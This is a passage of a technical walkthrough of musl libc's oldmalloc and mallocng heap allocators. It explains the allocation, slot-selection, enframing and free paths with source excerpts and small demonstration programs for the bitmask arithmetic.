If the size does not exceed MMAP_THRESHOLD, malloc first computes the bin-array index i for the chunk size via bin_index_up, then consults mal.binmap for a non-empty bin with index greater than or equal to i. Two cases follow. If there is no such bin, expand_heap is called to extend the heap, alloc_rev merges the newly extended chunk with the free chunk immediately before it, and the loop is exited. Otherwise, first_set returns the smallest qualifying index, the chunk is taken off that bin's list with pretrim or unbin, and the loop is likewise exited. Both paths end by calling trim, which carves a chunk of the requested size off of c for the allocation and frees the remainder.
```c
void *malloc(size_t n)
{
    struct chunk *c;
    int i, j;

    if (adjust_size(&n) < 0) return 0;

    if (n > MMAP_THRESHOLD) {
        size_t len = n + OVERHEAD + PAGE_SIZE - 1 & -PAGE_SIZE;
        char *base = __mmap(0, len, PROT_READ|PROT_WRITE,
            MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
        if (base == (void *)-1) return 0;
        c = (void *)(base + SIZE_ALIGN - OVERHEAD);
        c->csize = len - (SIZE_ALIGN - OVERHEAD);
        c->psize = SIZE_ALIGN - OVERHEAD;
        return CHUNK_TO_MEM(c);
    }

    i = bin_index_up(n);
    for (;;) {
        uint64_t mask = mal.binmap & -(1ULL<<i);
        if (!mask) {
            c = expand_heap(n);
            if (!c) return 0;
            if (alloc_rev(c)) {
                struct chunk *x = c;
                c = PREV_CHUNK(c);
                NEXT_CHUNK(x)->psize = c->csize =
                    x->csize + CHUNK_SIZE(c);
            }
            break;
        }
        j = first_set(mask);
        lock_bin(j);
        c = mal.bins[j].head;
        if (c != BIN_TO_CHUNK(j)) {
            if (!pretrim(c, n, i, j)) unbin(c, j);
            unlock_bin(j);
            break;
        }
        unlock_bin(j);
    }

    /* Now patch up in case we over-allocated */
    trim(c, n);

    return CHUNK_TO_MEM(c);
}
```
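The binmap trick is easy to miss: `-(1ULL<<i)` is a mask with every bit at position >= i set, so ANDing it with mal.binmap keeps only non-empty bins at least as large as the request, and the lowest set bit of the result is the best-fit bin. A minimal standalone sketch of the arithmetic (hypothetical bitmap values, not musl code):

```c
#include <stdint.h>
#include <stdio.h>

/* Lowest-set-bit index; plays the role of musl's first_set, simplified. */
static int first_set(uint64_t x) { return __builtin_ctzll(x); }

int main(void)
{
    /* Pretend bins 3, 7 and 20 are non-empty. */
    uint64_t binmap = (1ULL << 3) | (1ULL << 7) | (1ULL << 20);
    int i = 5;  /* smallest bin index that could satisfy the request */

    /* Keep only bins with index >= i ... */
    uint64_t mask = binmap & -(1ULL << i);
    /* ... then pick the smallest of those. */
    int j = first_set(mask);  /* -> 7, the best-fit non-empty bin */

    printf("mask=%#llx best bin=%d\n", (unsigned long long)mask, j);
    return 0;
}
```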
expand_heap
It first adds SIZE_ALIGN (0x20) to the size n to be extended, then calls __expand_heap to grow the heap, which returns the start address of the newly extended memory.
```c
/* The argument n already accounts for the caller's chunk
 * overhead needs, but if the heap can't be extended in-place,
 * we need room for an extra zero-sized sentinel chunk. */
n += SIZE_ALIGN;

lock(heap_lock);

p = __expand_heap(&n);
if (!p) {
    unlock(heap_lock);
    return 0;
}

/* If not just expanding existing space, we need to make a
 * new sentinel chunk below the allocated space. */
if (p != end) {
    /* Valid/safe because of the prologue increment. */
    n -= SIZE_ALIGN;
    p = (char *)p + SIZE_ALIGN;
    w = MEM_TO_CHUNK(p);
    w->psize = 0 | C_INUSE;
}
```
It then fills in the header information of the newly extended chunk and of the chunk after it.
```c
/* Record new heap end and fill in footer. */
end = (char *)p + n;
w = MEM_TO_CHUNK(end);
w->psize = n | C_INUSE;
w->csize = 0 | C_INUSE;

/* Fill in header, which may be new or may be replacing a
 * zero-size sentinel header at the old end-of-heap. */
w = MEM_TO_CHUNK(p);
w->csize = n | C_INUSE;
```
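For reference when reading the header/footer writes above, the chunk layout in oldmalloc is roughly the following (abbreviated from musl's malloc_impl.h; the comments are mine):

```c
struct chunk {
    size_t psize, csize;        /* in-band size of previous/this chunk */
    struct chunk *next, *prev;  /* bin links, only valid while free */
};

#define OVERHEAD (2*sizeof(size_t))          /* the two size words */
#define SIZE_ALIGN (4*sizeof(size_t))        /* 0x20 on 64-bit */
#define CHUNK_TO_MEM(c) (void *)((char *)(c) + OVERHEAD)
#define MEM_TO_CHUNK(p) (struct chunk *)((char *)(p) - OVERHEAD)
```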
On the free path, oldmalloc also returns the middle pages of large free chunks to the kernel:

```c
/* Replace middle of large chunks with fresh zero pages */
if (reclaim) {
    uintptr_t a = (uintptr_t)self + SIZE_ALIGN + PAGE_SIZE - 1 & -PAGE_SIZE;
    uintptr_t b = (uintptr_t)next - SIZE_ALIGN & -PAGE_SIZE;
#if 1
    __madvise((void *)a, b - a, MADV_DONTNEED);
#else
    __mmap((void *)a, b - a, PROT_READ|PROT_WRITE,
        MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
#endif
}
```
In mallocng, alloc_group chooses the slot count cnt for a new group of size class sc, trading memory usage against fragmentation:

```c
size_t size = UNIT * size_classes[sc];
int i = 0, cnt;
unsigned char *p;
struct meta *m = alloc_meta();
if (!m) return 0;
size_t usage = ctx.usage_by_class[sc];
size_t pagesize = PGSZ;
int active_idx;
if (sc < 9) {
    while (i < 2 && 4 * small_cnt_tab[sc][i] > usage)
        i++;
    cnt = small_cnt_tab[sc][i];
} else {
    // lookup max number of slots fitting in power-of-two size
    // from a table, along with number of factors of two we
    // can divide out without a remainder or reaching 1.
    cnt = med_cnt_tab[sc & 3];

    // data structures don't support groups whose slot offsets
    // in units don't fit in 16 bits.
    while (size * cnt >= 65536 * UNIT)
        cnt >>= 1;
}

// If we selected a count of 1 above but it's not sufficient to use
// mmap, increase to 2. Then it might be; if not it will nest.
if (cnt == 1 && size * cnt + UNIT <= pagesize / 2) cnt = 2;

// All choices of size*cnt are "just below" a power of two, so anything
// larger than half the page size should be allocated as whole pages.
if (size * cnt + UNIT > pagesize / 2) {
    // check/update bounce counter to start/increase retention
    // of freed maps, and inhibit use of low-count, odd-size
    // small mappings and single-slot groups if activated.
    int nosmall = is_bouncing(sc);
    account_bounce(sc);
    step_seq();

    // since the following count reduction opportunities have
    // an absolute memory usage cost, don't overdo them. count
    // coarse usage as part of usage.
    if (!(sc & 1) && sc < 32) usage += ctx.usage_by_class[sc + 1];

    // try to drop to a lower count if the one found above
    // increases usage by more than 25%. these reduced counts
    // roughly fill an integral number of pages, just not a
    // power of two, limiting amount of unusable space.
    if (4 * cnt > usage && !nosmall) {
        if (0);
        else if ((sc & 3) == 1 && size * cnt > 8 * pagesize) cnt = 2;
        else if ((sc & 3) == 2 && size * cnt > 4 * pagesize) cnt = 3;
        else if ((sc & 3) == 0 && size * cnt > 8 * pagesize) cnt = 3;
        else if ((sc & 3) == 0 && size * cnt > 2 * pagesize) cnt = 5;
    }
    size_t needed = size * cnt + UNIT;
    needed += -needed & (pagesize - 1);

    // produce an individually-mmapped allocation if usage is low,
    // bounce counter hasn't triggered, and either it saves memory
    // or it avoids eagar slot allocation without wasting too much.
    if (!nosmall && cnt <= 7) {
        req += IB + UNIT;
        req += -req & (pagesize - 1);
        if (req < size + UNIT || (req >= 4 * pagesize && 2 * cnt > usage)) {
            cnt = 1;
            needed = req;
        }
    }
```
Back in mallocng's malloc itself, a coarse size class may be used initially when no group of the desired class exists yet:

```c
// use coarse size classes initially when there are not yet
// any groups of desired size. this allows counts of 2 or 3
// to be allocated at first rather than having to start with
// 7 or 5, the min counts for even size classes.
if (!g && sc >= 4 && sc < 32 && sc != 6 && !(sc & 1) && !ctx.usage_by_class[sc]) {
    size_t usage = ctx.usage_by_class[sc | 1];
    // if a new group may be allocated, count it toward
    // usage in deciding if we can use coarse class.
    if (!ctx.active[sc | 1] || (!ctx.active[sc | 1]->avail_mask
        && !ctx.active[sc | 1]->freed_mask))
        usage += 3;
    if (usage <= 12)
        sc |= 1;
    g = ctx.active[sc];
}
```
malloc then tries to obtain the index of a free chunk from this meta's group: on success it updates avail_mask and jumps straight to success; otherwise it breaks out of the loop.
```c
for (;;) {
    mask = g ? g->avail_mask : 0;
    first = mask & -mask;
    if (!first) break;
    if (RDLOCK_IS_EXCLUSIVE || !MT)
        g->avail_mask = mask - first;
    else if (a_cas(&g->avail_mask, mask, mask - first) != mask)
        continue;
    idx = a_ctz_32(first);
    goto success;
}
upgradelock();
```
If the meta has no free chunk, alloc_slot is called to obtain a meta that does have one, and the head of the corresponding ctx.active deque is made to point at it.
```c
idx = alloc_slot(sc, n);
if (idx < 0) {
    unlock();
    return 0;
}
g = ctx.active[sc];
```
Finally, once the index of a free chunk has been obtained, enframe is called to take that chunk out.
```c
success:
    ctr = ctx.mmap_counter;
    unlock();
    return enframe(g, idx, n, ctr);
```
alloc_slot
```c
static int alloc_slot(int sc, size_t req)
{
    uint32_t first = try_avail(&ctx.active[sc]);
    if (first) return a_ctz_32(first);

    struct meta *g = alloc_group(sc, req);
    if (!g) return -1;

    // take slot 0 of the new group and put its meta on the active deque
    g->avail_mask--;
    queue(&ctx.active[sc], g);

    return 0;
}
```
alloc_slot first calls try_avail to obtain a meta that has a free chunk, pointing the head of the corresponding ctx.active deque at it. Failing that, it calls alloc_group to allocate a new group and queues that group's meta onto the deque (the deque then contains only this one meta, so the head of ctx.active points at it).
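For orientation, the bookkeeping structure these functions pass around looks roughly like this (abbreviated from mallocng's meta.h; the comments are mine):

```c
struct meta {
    struct meta *prev, *next;   /* links in the ctx.active[sc] deque */
    struct group *mem;          /* the group (slab of slots) this meta manages */
    volatile int avail_mask;    /* bit i set: slot i is available */
    volatile int freed_mask;    /* bit i set: slot i has been freed */
    uintptr_t last_idx:5;       /* index of the last slot, i.e. cnt-1 */
    uintptr_t freeable:1;
    uintptr_t sizeclass:6;
    uintptr_t maplen:8*sizeof(uintptr_t)-12;
};
```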
try_avail
First, if the deque is empty, try_avail returns 0 immediately.
```c
struct meta *m = *pm;
uint32_t first;
if (!m) return 0;

uint32_t mask = m->avail_mask;
if (!mask) {
    /* ... (the freed_mask handling shown below) ... */
}
first = mask & -mask;
m->avail_mask = mask - first;
return first;
```
If the current meta has neither available nor freed chunks, it is simply removed from the deque. To make full use of free chunks, the head of the deque is advanced to the next meta regardless of whether the current meta has freed chunks. If the deque becomes empty, 0 is returned. In the normal case, if there is a next meta, that meta is guaranteed to have available or freed chunks.
```c
if (!m->freed_mask) {
    dequeue(pm, m);
    m = *pm;
    if (!m) return 0;
} else {
    m = m->next;
    *pm = m;
}
```
If every chunk of the meta now at the head has been freed, then, again in the interest of making full use of free chunks, that group is skipped and the deque head is advanced to the next meta (unless it is the only group, or a permanently non-freeable one).
```c
mask = m->freed_mask;

// skip fully-free group unless it's the only one
// or it's a permanently non-freeable group
if (mask == (2u << m->last_idx) - 1 && m->freeable) {
    m = m->next;
    *pm = m;
    mask = m->freed_mask;
}

// activate more slots in a not-fully-active group
// if needed, but only as a last resort. prefer using
// any other group with free slots. this avoids
// touching & dirtying as-yet-unused pages.
if (!(mask & ((2u << m->mem->active_idx) - 1))) {
    if (m->next != m) {
        m = m->next;
        *pm = m;
    } else {
        int cnt = m->mem->active_idx + 2;
        int size = size_classes[m->sizeclass] * UNIT;
        int span = UNIT + size * cnt;
        // activate up to next 4k boundary
        while ((span ^ (span + size - 1)) < 4096) {
            cnt++;
            span += size;
        }
        if (cnt > m->last_idx + 1)
            cnt = m->last_idx + 1;
        m->mem->active_idx = cnt - 1;
    }
}
mask = activate_group(m);
assert(mask);
decay_bounces(m->sizeclass);
}
```
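The expression `(2u << m->last_idx) - 1` recurs throughout mallocng: it is the all-slots mask for a group. A tiny sketch (hypothetical values, not musl code) of the mask arithmetic used above:

```c
#include <assert.h>
#include <stdint.h>

int main(void)
{
    /* A group with 5 slots has last_idx == 4. */
    int last_idx = 4;
    uint32_t all = (2u << last_idx) - 1;   /* 0b11111: bits 0..4 set */
    assert(all == 0x1f);

    /* freed_mask == all means every slot has been freed. */
    uint32_t freed_mask = 0x1f;
    assert(freed_mask == all);             /* fully-free group */

    /* Lowest available slot: isolate the lowest set bit. */
    uint32_t avail_mask = 0x16;            /* 0b10110: slots 1, 2, 4 */
    uint32_t first = avail_mask & -avail_mask;
    assert(first == 2);                    /* slot 1 is taken first */
    return 0;
}
```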
enframe

enframe places the user region inside the chosen slot. To lengthen the interval before an address gets reused (and to help trap double frees), it cycles the offset of the region within the slot:

```c
// cycle offset within slot to increase interval to address
// reuse, facilitate trapping double-free.
int off = (p[-3] ? *(uint16_t *)(p - 2) + 1 : ctr) & 255;
assert(!p[-4]);
if (off > slack) {
    size_t m = slack;
    m |= m >> 1; m |= m >> 2; m |= m >> 4;
    off &= m;
    if (off > slack) off -= slack + 1;
    assert(off <= slack);
}
if (off) {
    // store offset in unused header at offset zero
    // if enframing at non-zero offset.
    *(uint16_t *)(p - 2) = off;
    p[-3] = 7 << 5;
    p += UNIT * off;
    // for nonzero offset there is no permanent check
    // byte, so make one.
    p[-4] = 0;
}
```
Finally, set_size, shown below, fills in the relevant header fields.
```c
static inline void set_size(unsigned char *p, unsigned char *end, size_t n)
{
    int reserved = end - p - n;
    if (reserved) end[-reserved] = 0;
    if (reserved >= 5) {
        *(uint32_t *)(end - 4) = reserved;
        end[-5] = 0;
        reserved = 5;
    }
    p[-3] = (p[-3] & 31) + (reserved << 5);
}
```
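Concretely: reserved = end - p - n is the slack left in the slot. Slack below 5 is stored directly in the top three bits of p[-3]; larger slack stores 5 there and puts the exact value in the last four bytes of the slot. A toy harness (not musl code, using a local copy of set_size) showing the encoding:

```c
#include <stdint.h>
#include <stdio.h>

/* Local copy of set_size for experimentation. */
static inline void set_size(unsigned char *p, unsigned char *end, size_t n)
{
    int reserved = end - p - n;
    if (reserved) end[-reserved] = 0;
    if (reserved >= 5) {
        *(uint32_t *)(end - 4) = reserved;
        end[-5] = 0;
        reserved = 5;
    }
    p[-3] = (p[-3] & 31) + (reserved << 5);
}

int main(void)
{
    /* Toy slot: 4 header bytes, then 0x40 usable bytes. */
    unsigned char buf[4 + 0x40] = {0};
    unsigned char *p = buf + 4, *end = p + 0x40;

    set_size(p, end, 0x34);  /* reserved = 0x40 - 0x34 = 12 >= 5 */

    /* p[-3]>>5 reads back as 5, meaning "exact slack is in the
     * 32-bit field at end-4", which holds 12. */
    printf("p[-3]>>5 = %d, *(uint32_t*)(end-4) = %u\n",
           p[-3] >> 5, *(uint32_t *)(end - 4));
    return 0;
}
```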
free

free first invalidates the slot's in-band header, then releases any whole pages contained in the slot:

```c
((unsigned char *)p)[-3] = 255;
// invalidate offset to group header, and cycle offset of
// used region within slot if current offset is zero.
*(uint16_t *)((char *)p - 2) = 0;

// release any whole pages contained in the slot to be freed
// unless it's a single-slot group that will be unmapped.
if (((uintptr_t)(start - 1) ^ (uintptr_t)end) >= 2 * PGSZ && g->last_idx) {
    unsigned char *base = start + (-(uintptr_t)start & (PGSZ - 1));
    size_t len = (end - base) & -PGSZ;
    if (len) {
        int e = errno;
        madvise(base, len, MADV_FREE);
        errno = e;
    }
}
```
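The page-trimming code uses two standard rounding idioms: -x & (PGSZ-1) rounds x up to the next page boundary, and & -PGSZ rounds a length down to whole pages. A minimal sketch (hypothetical addresses, 4 KiB pages):

```c
#include <assert.h>
#include <stdint.h>

int main(void)
{
    const uintptr_t PGSZ = 4096;

    uintptr_t start = 0x1000f30;   /* slot start, mid-page */
    uintptr_t end   = 0x1009e60;   /* slot end, mid-page   */

    /* First page boundary at or after start. */
    uintptr_t base = start + (-start & (PGSZ - 1));
    assert(base == 0x1001000);

    /* Length of the whole pages between base and end. */
    uintptr_t len = (end - base) & -PGSZ;
    assert(len == 0x8000);         /* 8 whole pages can be MADV_FREEd */
    return 0;
}
```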
If, once the chunk being freed is counted, every chunk in the group is either freed or available, the loop is exited; otherwise freed_mask is updated and free returns.
```c
// atomic free without locking if this is neither first or last slot
for (;;) {
    uint32_t freed = g->freed_mask;
    uint32_t avail = g->avail_mask;
    uint32_t mask = freed | avail;
    assert(!(mask & self));
    if (!freed || mask + self == all) break;
    if (!MT)
        g->freed_mask = freed + self;
    else if (a_cas(&g->freed_mask, freed, freed + self) != freed)
        continue;
    return;
}
```
If the loop is exited, nontrivial_free is called to release the group; it returns the base address and size of the memory that needs to be munmapped, and munmap is then called on that region.
```c
wrlock();
struct mapinfo mi = nontrivial_free(g, idx);
unlock();
if (mi.len) {
    int e = errno;
    munmap(mi.base, mi.len);
    errno = e;
}
```
nontrivial_free
If, counting the chunk being freed, every chunk in the group is either freed or available, and the group is freeable, nontrivial_free first checks whether the meta is on the active deque and, if so, dequeues it. If dequeuing changed the active pointer, activate_group is called on the group of the meta that active now points at. free_group is then called to release the group containing the chunk, returning the memory to be munmapped.
```c
if (mask + self == (2u << g->last_idx) - 1 && okay_to_free(g)) {
    // any multi-slot group is necessarily on an active list
    // here, but single-slot groups might or might not be.
    if (g->next) {
        assert(sc < 48);
        int activate_new = (ctx.active[sc] == g);
        dequeue(&ctx.active[sc], g);
        if (activate_new && ctx.active[sc])
            activate_group(ctx.active[sc]);
    }
    return free_group(g);
}
```
If the meta containing the chunk has neither freed nor available chunks, the meta is queued back onto active. Finally, freed_mask is updated.
```c
else if (!mask) {
    assert(sc < 48);
    // might still be active if there were no allocations
    // after last available slot was taken.
    if (ctx.active[sc] != g) {
        queue(&ctx.active[sc], g);
    }
}
a_or(&g->freed_mask, self);
return (struct mapinfo){0};
```
free_group
free_group first updates usage_by_class. If the group was obtained via mmap, it returns the group's memory; otherwise it calls nontrivial_free to free the chunk the group itself lives in (groups can be nested inside another group's slot). Afterwards the meta is freed.
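The function itself is short; roughly the following (abbreviated from mallocng's free.c, and it may differ slightly across musl versions):

```c
static struct mapinfo free_group(struct meta *g)
{
    struct mapinfo mi = { 0 };
    int sc = g->sizeclass;
    if (sc < 48) {
        ctx.usage_by_class[sc] -= g->last_idx + 1;
    }
    if (g->maplen) {
        // group has its own mapping: hand it back to be munmapped
        step_seq();
        record_seq(sc);
        mi.base = g->mem;
        mi.len = g->maplen * 4096;
    } else {
        // group nested in another group's slot: free that slot instead
        void *p = g->mem;
        struct meta *m = get_meta(p);
        int idx = get_slot_index(p);
        g->mem->meta = 0;
        mi = nontrivial_free(m, idx);
    }
    free_meta(g);
    return mi;
}
```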
okay_to_free

```c
static int okay_to_free(struct meta *g)
{
    int sc = g->sizeclass;

    if (!g->freeable) return 0;

    // always free individual mmaps not suitable for reuse
    if (sc >= 48 || get_stride(g) < UNIT * size_classes[sc])
        return 1;

    // always free groups allocated inside another group's slot
    // since recreating them should not be expensive and they
    // might be blocking freeing of a much larger group.
    if (!g->maplen) return 1;

    // if there is another non-full group, free this one to
    // consolidate future allocations, reduce fragmentation.
    if (g->next != g) return 1;

    // free any group in a size class that's not bouncing
    if (!is_bouncing(sc)) return 1;

    size_t cnt = g->last_idx + 1;
    size_t usage = ctx.usage_by_class[sc];

    // if usage is high enough that a larger count should be
    // used, free the low-count group so a new one will be made.
    if (9 * cnt <= usage && cnt < 20) return 1;

    // otherwise, keep the last group in a bouncing class.
    return 0;
}
```